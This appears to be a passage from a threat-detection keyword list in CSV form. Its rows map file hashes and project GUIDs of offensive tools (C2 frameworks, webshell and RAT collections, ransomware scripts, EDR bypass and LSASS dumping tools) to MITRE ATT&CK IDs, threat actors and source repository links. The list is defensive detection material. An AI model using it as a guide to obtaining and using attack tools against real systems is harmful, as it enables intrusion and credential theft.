"*a43682fd04ffe7d7a41a4b9a1afeddda45f2a74cca6632bbf4d7d6c110e2ff80*",".{0,1000}a43682fd04ffe7d7a41a4b9a1afeddda45f2a74cca6632bbf4d7d6c110e2ff80.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#filehash","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","32441"
"*a43bb6f7722fc5426cf74039935d60d648f085aa1f463ec94c32add776fa3928*",".{0,1000}a43bb6f7722fc5426cf74039935d60d648f085aa1f463ec94c32add776fa3928.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32442"
"*a43f8c6f567c0280ddb10660ab9a00f492741d3c4e668c2ca8ea171dc30cb083*",".{0,1000}a43f8c6f567c0280ddb10660ab9a00f492741d3c4e668c2ca8ea171dc30cb083.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","32443"
"*a441bc5046ec91f60d5a185edbee6a17e309c87f3268bb9c45bb9c83bb28ec23*",".{0,1000}a441bc5046ec91f60d5a185edbee6a17e309c87f3268bb9c45bb9c83bb28ec23.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","32444"
"*a44a5e8e65266611d5845d88b43c9e4a9d84fe074fd18f48b50fb837fa6e429d*",".{0,1000}a44a5e8e65266611d5845d88b43c9e4a9d84fe074fd18f48b50fb837fa6e429d.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","32445"
"*a451317248c1067c50ee91efa32c74d6e83b7110dadbe5120e41925adce76594*",".{0,1000}a451317248c1067c50ee91efa32c74d6e83b7110dadbe5120e41925adce76594.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32448"
"*a45833f0ee2541c060b8154389fdca5cf5bd19f460352eae83c4fbe024edc803*",".{0,1000}a45833f0ee2541c060b8154389fdca5cf5bd19f460352eae83c4fbe024edc803.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","32449"
"*a45aba3ece9369139d34d85d5024d057d98134cb72b23db28589cff428499763*",".{0,1000}a45aba3ece9369139d34d85d5024d057d98134cb72b23db28589cff428499763.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32450"
"*A45C184F-F98F-4258-A928-BFF437034791*",".{0,1000}A45C184F\-F98F\-4258\-A928\-BFF437034791.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","32451"
"*a4635952ba5d7927ceb57a1533c38a7a55a4835de85c4794fa85d863866d5588*",".{0,1000}a4635952ba5d7927ceb57a1533c38a7a55a4835de85c4794fa85d863866d5588.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32455"
"*A46C9A13-145E-42C0-8CA6-CC920BF1D9F1*",".{0,1000}A46C9A13\-145E\-42C0\-8CA6\-CC920BF1D9F1.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","#GUIDproject","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","32457"
"*a46d2986f634a23bf7156290284914da2c25c35b9484c11e119cb2c2f5bd5c08*",".{0,1000}a46d2986f634a23bf7156290284914da2c25c35b9484c11e119cb2c2f5bd5c08.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","32458"
"*a475f8e5b3581cb7b93cd3021478957ec5997aa3995c1a686fb87ae6c84ec2b1*",".{0,1000}a475f8e5b3581cb7b93cd3021478957ec5997aa3995c1a686fb87ae6c84ec2b1.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#filehash","N/A","10","","N/A","","","","32459"
"*a48043a8756908a15c435bbab7ddcfc26d6462fbba9f7597e581535743c8a3cf*",".{0,1000}a48043a8756908a15c435bbab7ddcfc26d6462fbba9f7597e581535743c8a3cf.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32462"
"*a48708d0c27daec437448a1363e63b53d518cf00e60d701fe5f6292ffab1df00*",".{0,1000}a48708d0c27daec437448a1363e63b53d518cf00e60d701fe5f6292ffab1df00.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#filehash","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","32464"
"*a487628dc7647507f77cff66269d5d4588c7647e408b07ec0c4b1f16a93eefc4*",".{0,1000}a487628dc7647507f77cff66269d5d4588c7647e408b07ec0c4b1f16a93eefc4.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","32465"
"*a489c0ab41646b1e2c65390196f453b4aa04ab76133711a264ae33ab8bca0026*",".{0,1000}a489c0ab41646b1e2c65390196f453b4aa04ab76133711a264ae33ab8bca0026.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32466"
"*a492bbf95a3db658f1f1114789c481e91374623bb6484c998e1f1487e0ef717e*",".{0,1000}a492bbf95a3db658f1f1114789c481e91374623bb6484c998e1f1487e0ef717e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32469"
"*a4936a59be5cbe4f0ccba2dcc55dfdbe453cc38b60de5732849776683cd85e17*",".{0,1000}a4936a59be5cbe4f0ccba2dcc55dfdbe453cc38b60de5732849776683cd85e17.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32470"
"*a494bbc30a636c51bae886c742f6a46a9ab049c26c4143d186cbc7ee5a55099a*",".{0,1000}a494bbc30a636c51bae886c742f6a46a9ab049c26c4143d186cbc7ee5a55099a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32471"
"*a4a32b65f7452ee26bb5be301620461938d46f44455a5be4e872a6dda8c6150e*",".{0,1000}a4a32b65f7452ee26bb5be301620461938d46f44455a5be4e872a6dda8c6150e.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","32473"
"*a4a394d85597168c85a244e6ec4d8ff7c8a92f3938bf40dac9ba5a0ce9803d05*",".{0,1000}a4a394d85597168c85a244e6ec4d8ff7c8a92f3938bf40dac9ba5a0ce9803d05.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","32474"
"*a4b26a3d01e61601dbc2a82f6301e122847e57be910cf80d77ba83c1ed290b6d*",".{0,1000}a4b26a3d01e61601dbc2a82f6301e122847e57be910cf80d77ba83c1ed290b6d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32476"
"*a4b8bd1215b90dccd2c0d3241bbac4bad1430eaceb342f80097f0e3b93c2ab9a*",".{0,1000}a4b8bd1215b90dccd2c0d3241bbac4bad1430eaceb342f80097f0e3b93c2ab9a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32477"
"*a4cba56cfdae80bcfad6745fb2ea7ffe407534d449414b198b5eea43239ba43c*",".{0,1000}a4cba56cfdae80bcfad6745fb2ea7ffe407534d449414b198b5eea43239ba43c.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","32480"
"*a4cc9799fdba898f24de68be43dff98a9c8a153dbf016fdd042127e4b31bbc34*",".{0,1000}a4cc9799fdba898f24de68be43dff98a9c8a153dbf016fdd042127e4b31bbc34.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#filehash","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","32481"
"*a4ce76854c9c0a5ffd167bfef3e659a95d37d605767b71435b7539461e3185ae*",".{0,1000}a4ce76854c9c0a5ffd167bfef3e659a95d37d605767b71435b7539461e3185ae.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32482"
"*A4D129236E794B44A883AA46B8722E7190DBAC0F0AED2FEBB087C93C81CA6383*",".{0,1000}A4D129236E794B44A883AA46B8722E7190DBAC0F0AED2FEBB087C93C81CA6383.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32483"
"*a4d2d5e38ec0bf86be4572151ceac1cf5b8eed54eae425b89f5274ee9dfc331e*",".{0,1000}a4d2d5e38ec0bf86be4572151ceac1cf5b8eed54eae425b89f5274ee9dfc331e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32484"
"*a4d92518de887211fcc6d0f0c011336140fa14d69a505223947a088cec3a9c0f*",".{0,1000}a4d92518de887211fcc6d0f0c011336140fa14d69a505223947a088cec3a9c0f.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","#filehash","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","32485"
"*a4e7ad2bf439d52663283ff7925e7935d3e770f95fa399bb99aa0adee0945c59*",".{0,1000}a4e7ad2bf439d52663283ff7925e7935d3e770f95fa399bb99aa0adee0945c59.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32488"
"*a4e7e725eb3998e5dadef0f903eb5e5f3e2b879876b239a891de5f95ecb2c1c4*",".{0,1000}a4e7e725eb3998e5dadef0f903eb5e5f3e2b879876b239a891de5f95ecb2c1c4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32489"
"*a4fee85a73d5192f1daa887e5357eb1304acd73425842f7ed690783c2a27a26f*",".{0,1000}a4fee85a73d5192f1daa887e5357eb1304acd73425842f7ed690783c2a27a26f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32491"
"*a5034ebb8d6c31c71947c4f85a505f66fd1aadc71cecedd96f1bd02b3e471f62*",".{0,1000}a5034ebb8d6c31c71947c4f85a505f66fd1aadc71cecedd96f1bd02b3e471f62.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","32492"
"*a5034ebb8d6c31c71947c4f85a505f66fd1aadc71cecedd96f1bd02b3e471f62*",".{0,1000}a5034ebb8d6c31c71947c4f85a505f66fd1aadc71cecedd96f1bd02b3e471f62.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","32493"
"*a507307a4b6e0f6f00e8a3f3330204c124fa5a69cfc03ffd89235c7e4b77f25d*",".{0,1000}a507307a4b6e0f6f00e8a3f3330204c124fa5a69cfc03ffd89235c7e4b77f25d.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","#filehash","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","32494"
"*a50cefaf5e3c111224055a9e3e4d289c7c44dc0d8405bf96a52f8c6d254aaeca*",".{0,1000}a50cefaf5e3c111224055a9e3e4d289c7c44dc0d8405bf96a52f8c6d254aaeca.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32497"
"*a50f337900d9adf19bfda21fa5d89c5b1525cbb96c1cddb9443e62d56f5a8e5b*",".{0,1000}a50f337900d9adf19bfda21fa5d89c5b1525cbb96c1cddb9443e62d56f5a8e5b.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","32498"
"*a510e14853234b49b9053a18264aa29e4dfbf467edae47afe13a08d57d34dad4*",".{0,1000}a510e14853234b49b9053a18264aa29e4dfbf467edae47afe13a08d57d34dad4.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","#filehash","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","32499"
"*a512642f7af44ee8946f171b8921997ec271bf1c9f1e747067a6dc7b192d4ecd*",".{0,1000}a512642f7af44ee8946f171b8921997ec271bf1c9f1e747067a6dc7b192d4ecd.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","32500"
"*a516bc50f144f04756e380fcf24791cd1851a5d3856f6feb66e509ad0f087536*",".{0,1000}a516bc50f144f04756e380fcf24791cd1851a5d3856f6feb66e509ad0f087536.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32501"
"*a516e0818b79c222bdc64dcc4f94733ec0678a1dd16a6502d2fc2c722142a5e5*",".{0,1000}a516e0818b79c222bdc64dcc4f94733ec0678a1dd16a6502d2fc2c722142a5e5.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","32502"
"*A517A8DE-5834-411D-ABDA-2D0E1766539C*",".{0,1000}A517A8DE\-5834\-411D\-ABDA\-2D0E1766539C.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#GUIDproject","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32503"
"*a52770362aceeca8d893ccb0fcfdf76991a94dc3e9cac0e595c897d1392dcaac*",".{0,1000}a52770362aceeca8d893ccb0fcfdf76991a94dc3e9cac0e595c897d1392dcaac.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32507"
"*a5323adc6557587f17fc2766b95efbf76e5148dbc14b744cbf72b40bdc40f601*",".{0,1000}a5323adc6557587f17fc2766b95efbf76e5148dbc14b744cbf72b40bdc40f601.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32508"
"*a53818852885cf956baa7b75e10a818ecef060c2c3ab1026d6f0cbbf2f47810e*",".{0,1000}a53818852885cf956baa7b75e10a818ecef060c2c3ab1026d6f0cbbf2f47810e.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32509"
"*a53c9d30294edfc74b34a79352c05882e23ddd37678ae419c083345bec6b4880*",".{0,1000}a53c9d30294edfc74b34a79352c05882e23ddd37678ae419c083345bec6b4880.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32511"
"*a53d0d8ca3a89a4e43ea2993031c375499cc01810dc18c65097993c43cc03ea9*",".{0,1000}a53d0d8ca3a89a4e43ea2993031c375499cc01810dc18c65097993c43cc03ea9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32512"
